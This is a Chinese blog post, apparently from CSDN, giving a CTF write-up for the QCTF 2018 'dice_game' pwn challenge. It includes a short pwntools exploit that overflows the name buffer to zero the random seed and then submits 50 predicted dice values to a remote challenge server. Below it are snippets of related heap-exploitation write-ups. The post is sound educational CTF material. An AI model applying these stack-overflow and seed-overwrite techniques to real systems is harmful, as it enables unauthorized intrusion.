dice_game XCTF 4th-QCTF-2018

最新推荐文章于 2023-10-29 19:50:32 发布
最新推荐文章于 2023-10-29 19:50:32 发布
阅读量1.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41071646/article/details/89606595
本文探讨了一种pwn题目中的策略,通过覆盖随机数种子实现稳定利用。作者分享了利用固定种子的方法,避免了因时间变化导致的随机数不可预测性,确保攻击的一致性和成功率。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

其实感觉这个题 不算是pwn题。。。 

这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数

 

随机数啊   本来我没有想用 把种子给 覆盖掉  但是   time(0) 感觉不稳   时间一万一不对劲 那么随机数 也会出错  

所以干脆 把种子固定下来 

下面是 exp

#coding:utf-8

from pwn import*
lists=[2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]

#io=process("./pwn")
io=remote('111.198.29.45',53973)
io.recvuntil("name: ")
io.sendline("a" * 0x40 + p64(0))

for i in lists:
	io.recvuntil("Give me the point(1~6): ")
	io.sendline(str(i))

print io.recv()
io.interactive()

 

攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 999
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 954
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
XCTF GAME
YenKoc的博客
01-15 1066
首先这题有两种解法,一种是使用ida查看伪代码直接写exp跑出flag,另外一种是调试,因为最近在学调试,刚好用于实战上了。 一.查壳 二.32位文件拖入od动态调试 先找到game的主要函数,插件中文智能搜索一下所有的字符串。 找到了,那个input :的字符串,就是我们需要找到game的函数,同时在第一张图片中也找到了一个done flag is,猜测是正确后会得到flag,那么只要修改...
XCTF-game
hanpiao_的博客
10-29 185
print(chr(a[i]),end='') #转化为字符类型,不想让他换行后面加end=''看到一个if语句,以及判断的条件推测这就是得到flag的条件(用1和0来判断8个灯的亮灭)for i in range(57): # 57次循环 0~56 前包后不包。当8个灯都亮的时候就输出flag,这里跟进sub_457AB4()继续跳转,看到提示,flag就在这里。题目更改了脚本异或的地方不一样。
XCTF 4th-QCTF-2018 dice_game
qq_43409582的博客
10-23 781
首先开一下保护除了canary什么都开了。。。 然后就打开ida分析: read函数造成了栈溢出漏洞。 继续审代码,发现是一个游戏。该程序首先让输入name,并且使用read来读入数据,故而此处存在栈溢出漏洞。下方看见程序使用seed、srand生成随机数。当我们猜对50次随机数时程序会调用sub_B28函数,从而得到flag. 这个随机数咋办呢,,有栈溢出漏洞可以利用,所以就想着能不能将seed...
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
qctf_2018_dice_game,xm_2019_awd_pwn2
m0_51251108的博客
09-20 284
qctf_2018_dice_game(溢出控制其他变量),xm_2019_awd_pwn2(tcache doublefree)
XCTF】【GFSJ0487】【Reverse】【难度3】game
新青年1号
07-31 900
XCTF】【GFSJ0487】【Reverse】【难度3】game
XCTF-gametime
qq_52974719的博客
06-23 309
XCTF-gametime 1、无壳,ida打开f5看伪代码 发现有很多判断,判断输入是否是他的要求,运行exe也确实需要很多判断,如果判断不通过,则直接退出程序,所以需要让判断函数sub_401507和sub_401435函数返回为真,跟进后发现这俩函数的真假都由sub_401260这个函数决定,这样只需让401260为真即可,问题规模缩小了。 sub_401260函数 查看401260函数的汇编 在对eax中存入的值与-1进行比较和edi中的值进行比较,如果不相等就跳转到Loc_4012AD去,而这
XCTF 4th-QCTF-2018 babyheap
qq_41071646的博客
07-28 1910
这几天做pwn题做的很恶心了,,等下个星期想去继续肝内核pwn。。 先看一下这个题目的保护 基本该有的保护都有了 然后先看一下这个题 ida里面分析 发现了 程序没有给我们堆块修改的功能 这里可以通过 堆块合并 /重叠 然后申请达到修改堆块还有泄露堆块的目的 这里我们发现了 off by null 然后这里的思路 exp 来源于 https://www.xct...
[XCTF-pwn] 26_xctf-4th-QCTF-2018_noleak
weixin_52640415的博客
03-09 268
程序有add,edit,free没有show,pie未开,bss可写执行,有写溢出漏洞和UAF漏洞,unlink+fastbin attack,无需泄露地址。 解题思路: 先建0x28,0x80,0x10块,利用写溢出在释放1块时进行unlink控制指针区; 由于free时不清指针,且仅允许建9块,在控制指针区后清指针,保留控制指针的指针;并预留shellcode 建0x10,0x60,0x10在原unsort位置,释放0x60块后通过写溢出修改0x60的头为0x91再释放在0x60的fd位置得
No leak XCTF 4th-QCTF-2018
qq_41071646的博客
07-25 724
这个题真的很好玩 先看一下保护 PIE 和 NX没开 那么我们可以 用shellcode 来写这一道题 先用ida 看一下题目 会发现 没有show 也就是输出函数 但是 dele 函数确实能够 安排很多东西 UAF 等等 而且我们发现 edit 可以自己定size 那么 就可以堆溢出 但是有一点就是 由于指针没有清0 如果我们不自己清0...
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 683
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
XCTF gametime
TA不懒,但还没有添加简介
04-03 257
XCTF gametime
XCTF-Reverse:game(涉及异或脚本编写)
_Co1a
11-19 559
题目地址:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074&page=1 工具: ida pro、python环境 知识:简单的算法分析,简单的脚本编写 方法一、 玩游戏,依次按12345678后出现flag done!!! the flag is zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t} 方法二.
三、从零开始学逆向之XCTF-game(IDA控制程序执行流程)
nini_boom的博客
07-05 1658
0x00 game初步分析 老铁们可以自行理解下英文,我就说个大概内容,让8盏灯全部都亮,那就算完事,flag就会自己出来。 先把它丢进IDA反编译下。 看到这里,猜测sub_457AB4()大概就是打印flag的地方了,双击切进去看下。 果然,看到了flag is心情很激动,但是看到flag经由这么多数据得到,懒癌的我倒吸了一口凉气。 这道题有多种方法,其中一种就是把这些数据拷贝出来,然后手写程序跑出flag,算法好的同学也可以用BFS(广度优先搜索)试试。题目这意思,也不排除是考这个算法。 我
xctf game解法2——沙窝里
weixin_43600412的博客
09-22 928
game 上次在bugku遇见同一道题,用的是od动态分析,这次试用ida静态分析一次,并尽可能详细写出解题步骤。 1.代码载入ida分析 将程序载入ida进行分析,并找到主函数。(寻找主函数步骤:将界面下端输出窗口上移一些,右键点击上方‘函数名称’,再点击‘快速筛选’,在下面出现的空白框中输入‘main’)点击选择框中的‘main’,双击按F5再进入主函数伪代码: 从主函数内容可知,我们需要...
XCTF 攻防世界 Reverse新手题(game)
weixin_43456810的博客
12-12 1104
XCTF 攻防世界 Reverse新手题(game) 这道题目按照一般IDA静态分析的思路走,应该不难做出来 首先,找到main函数,F5反编译一下 发现main_0()函数,进入此函数,反编译一下 对main_0()的代码进行分析,可以看到最后一部分的if段,当8个值都为1时,调用sub_457AB4()函数,代码如下: if ( byte_532E28[0] == 1 && byte_532E28[1] == 1 && byte_532E28[2]
xctf攻防世界game writeup
qq_42983283的博客
11-04 394
下载,查看: 载入ida,f5分析,发现sub_457AB4那里很可能是答案: void main_0() { signed int i; // [esp+DCh] [ebp-20h] int v1; // [esp+F4h] [ebp-8h] sub_45A7BE(&unk_50B110); sub_45A7BE(&unk_50B158); sub_45A7BE(&unk_50B1A0); sub_45A7BE(&unk_50B1E8..
dice_game XCTF
最新发布
01-14
### 关于Dice GameXCTF竞赛中的问题材料 #### 题目概述 Dice GameXCTF 竞赛中的一道 PWN 类型题目,该二进制文件具有特定的安全特性配置。通过 `checksec` 工具检测发现此程序启用了完整的RELRO和NX位,但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值